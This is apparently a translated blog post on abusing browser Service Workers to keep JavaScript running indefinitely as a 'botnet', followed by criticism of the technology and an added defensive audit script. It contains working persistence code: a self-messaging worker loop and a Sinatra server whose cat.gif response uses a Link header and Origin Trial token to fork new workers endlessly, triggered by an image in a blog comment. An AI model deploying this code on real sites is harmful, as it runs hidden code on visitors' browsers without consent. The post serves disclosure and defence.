
Using Service Worker to create a botnet



In short: in this post we will look at one of the many ways to keep JavaScript running indefinitely in the browser by means of the Service Worker, and along the way criticize the technology itself a little.

You will find an example at this link. Open it and close the tab. After a few minutes, open DevTools / Application / ServiceWorker / Show All: as you can see, the code is still running (although by now this may already have been fixed).

The catworker runs continuously and, zombie-like, carries out whatever tasks it is given. This means a malicious page is not even required: any blog will do. The ability to embed third-party images in the comments is enough to start our code:
```html
<img src="https://truefactor.io/cat.gif">
```

Web developers did not expect this: how can an image tag trigger JS execution? How can JS run continuously? Is that even possible?

Service Worker is too hard


To boost the popularity of "progressive" web applications, the Chrome team shipped the Service Worker without asking you for permission. In practice, this new "advanced" solution is used only to show pop-up push notifications (translator's note: of course, the usefulness of Service Workers is not limited to this; they are also used, for example, for offline mode and background sync). If you don't take my word for it, open the Service Workers registered in your browser and study their contents.

Even that is not so simple: hundreds of lines of code, a dependency on FCM (translator's note: FCM = Firebase Cloud Messaging, but it is not mandatory in this case), and so on. Put sw.js on the server, register the worker on the client side, wait for the Promise to resolve, then call serviceWorkerRegistration.pushManager.getSubscription(), request the endpoint and registration_id and save them on the server.

This is how I would implement it:

```javascript
// Proposed API, not an existing one: one call, one permission prompt, one endpoint.
navigator.pushManager.getSubscription("We will send you weather updates once an hour")
  .then(function (endpoint) {
    // FCM endpoint
  });
```

In my humble opinion, Service Worker is a great answer to a question nobody asked. Learning this solution is much harder than AppCache (translator's note: AppCache, in turn, is considered an obsolete technology with drawbacks of its own), and on top of that it is less reliable.

How to keep it running long-term


A Service Worker is shut down 60 seconds after it receives its last event, for example onmessage, onfetch, onforeignfetch, etc.

1. Send messages to yourself.

```javascript
// Placeholder for the worker's real work; it must return a Promise.
var doSomething = function () {
  return Promise.resolve('payload');
};

self.addEventListener('message', function (event) {
  // Resolves after 30 s, having posted a new message to this very worker,
  // so the next 'message' event arrives before the 60-second idle timeout.
  var spawnNewMessageEvent = function (data) {
    return new Promise(function (success) {
      setTimeout(function () {
        var sw = self.registration.active;
        sw.postMessage(data);
        success("success");
      }, 30000);
    });
  };
  // waitUntil keeps the worker alive until the chained Promise settles.
  event.waitUntil(doSomething().then(spawnNewMessageEvent));
});
```

2. Two workers send each other ForeignFetch requests. To use ForeignFetch you need an Origin Trial token, and obtaining one is a fully automated process that requires no review or confirmation: it lets an attacker deploy new experimental technologies on real users without their consent.

3. The catworker sends a fetch request to cat.gif, and as a result a new worker is registered with a different scope (this is called registration via the Link header). The process repeats every 55 seconds.

```ruby
require 'sinatra'

# Origin Trial token that enables ForeignFetch for https://truefactor.io
ot = 'AglMWHYLtMNT8FVZp9u368r0HZPKh7Pjfm7WYEyHwKz4zwaSznv682Bckrz903mz54CVZQACD5ZlSrLpuh8CKQIAAABYeyJvcmlnaW4iOiAiaHR0cHM6Ly90cnVlZmFjdG9yLmlvOjQ0MyIsICJmZWF0dXJlIjogIkZvcmVpZ25GZXRjaCIsICJleHBpcnkiOiAxNDg0OTM2NzI3fQ=='

get "/cat.gif" do
  response.headers['Origin-Trial'] = ot
  response.headers['Access-Control-Allow-Origin'] = '*'
  # Link-header registration: every response points at a worker script with a
  # random query string and a random scope, so each fetch registers a new worker.
  response.headers['Link'] = '</sw?' + rand(999999999).to_s + '>; rel="serviceworker"; scope="/' + rand(999999999).to_s + '"'
  if params[:skip]
    'ok'
  else
    response.headers['Content-Type'] = "image/gif"
    File.binread('./cat.gif')
  end
end

get "/sw" do
  response.headers['Content-Type'] = "text/javascript"
  # The random comment makes every worker script byte-different, so it is never
  # treated as the same script; after 30 s the worker fetches cat.gif again and forks.
  <<HTML
//#{rand(999999999).to_s}
setTimeout(function(){
  console.log("Forking")
  fetch('https://truefactor.io/cat.gif?skip=1&'+Math.random());
}, 30000);
HTML
end
```
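As an added, defender-side example (not code from the original post), here is a JavaScript audit for the chain described in the three steps above: it parses the Link header that the cat.gif handler emits, and it flags registrations whose script URL or scope the site never declared. The site policy, the sample registrations and the site.example origin are constructed for the example.

```javascript
// Added example, not the post's code: audit SW registrations (samples below are constructed).
// Parses `</sw?123>; rel="serviceworker"; scope="/456"` into [{url, rel, scope}].
function parseLinkHeader(value) {
  const links = [];
  for (const part of value.split(',')) {
    const m = part.trim().match(/^<([^>]*)>\s*(.*)$/);
    if (!m) continue;
    const link = { url: m[1] };
    for (const attr of m[2].split(';')) {
      const kv = attr.trim().match(/^(\w+)\s*=\s*"?([^"]*)"?$/);
      if (kv) link[kv[1].toLowerCase()] = kv[2];
    }
    links.push(link);
  }
  return links;
}
// True when a response attempts Link-header registration, as the cat.gif handler above does.
function linkHeaderRegistersWorker(headers) {
  const value = headers.link || headers.Link;
  return !!value && parseLinkHeader(value).some(l => (l.rel || '').split(/\s+/).includes('serviceworker'));
}
// Registrations that violate the site's policy, with reasons: a random query string on the
// script URL or an undeclared scope is the fingerprint of the self-forking chain.
function auditRegistrations(registrations, policy) {
  const findings = [];
  for (const reg of registrations) {
    const script = new URL(reg.scriptURL), scope = new URL(reg.scope), reasons = [];
    if (!policy.allowedScripts.includes(script.pathname)) reasons.push('unexpected script ' + script.pathname);
    if (script.search) reasons.push('script URL has a query string ' + script.search);
    if (!policy.allowedScopes.includes(scope.pathname)) reasons.push('unexpected scope ' + scope.pathname);
    if (reasons.length) findings.push({ scope: reg.scope, scriptURL: reg.scriptURL, reasons });
  }
  return findings;
}
// Browser-only (not run here): unregister every flagged registration, return how many.
async function unregisterUnexpected(policy) {
  const regs = await navigator.serviceWorker.getRegistrations();
  const plain = regs.map(r => ({ scope: r.scope, scriptURL: (r.active || r.waiting || r.installing).scriptURL }));
  const bad = new Set(auditRegistrations(plain, policy).map(f => f.scope));
  await Promise.all(regs.filter(r => bad.has(r.scope)).map(r => r.unregister()));
  return bad.size;
}
// Constructed sample: the site's own worker plus one forked through the Link header.
const SAMPLE_POLICY = { allowedScripts: ['/sw.js'], allowedScopes: ['/'] };
const SAMPLE_REGISTRATIONS = [
  { scope: 'https://site.example/', scriptURL: 'https://site.example/sw.js' },
  { scope: 'https://site.example/482913', scriptURL: 'https://site.example/sw?771204' },
];
const SAMPLE_FINDINGS = auditRegistrations(SAMPLE_REGISTRATIONS, SAMPLE_POLICY); // one finding
```

On the server side, the same parseLinkHeader check can be run over proxied responses to spot a Link header with rel="serviceworker" on a resource that should be a plain image.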

How can attackers use it?


Right now, intruders have three options for attacking your browser:


Service Worker processes are persistent by nature. They keep running after you close the tab, they wake up on randomly arriving sync events, they update every 24 hours, and if you have allowed the website to send push notifications they can execute JS code every time a notification is displayed. All of this has long been in use.
In the future, cybercriminals will have even more ways to bypass the protections so that their code keeps running.

Right now this class of bugs receives too little attention. The tickets are public (1, 2, 3) and get the lowest priority.

Besides all this, the Origin Trial approach is not flawless: anyone can get a token, and anyone can use an experimental feature for their own purposes. You need to be able to enable and disable Service Workers at will.

I am convinced that a checkbox to disable Service Workers needs to be added. Personally, this technology gives me nothing. (Have you read the Cache documentation? It might as well be written in Chinese.) New features go live without proper review, so you cannot be sure about the Same Origin Policy and other important security concepts... Here are descriptions of a few more minor security vulnerabilities: FF, JSONP + XSS = takeover, attack on sandboxed domains.

Source: https://habr.com/ru/post/318000/
